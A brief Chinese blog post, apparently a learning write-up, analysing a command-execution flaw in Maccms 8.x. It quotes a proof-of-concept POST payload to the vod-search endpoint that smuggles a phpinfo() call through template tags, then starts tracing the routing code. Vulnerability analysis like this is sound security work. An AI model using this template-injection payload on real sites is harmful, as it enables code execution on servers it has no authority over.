Maccms8.x 命令執行分析

在很多地方看到有這個漏洞,自己學着分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}} 在index.php這裏主要是進行模板的路由規則替換,vod-search就會拆分成vod和search,然後載入vod.php
相關文章
相關標籤/搜索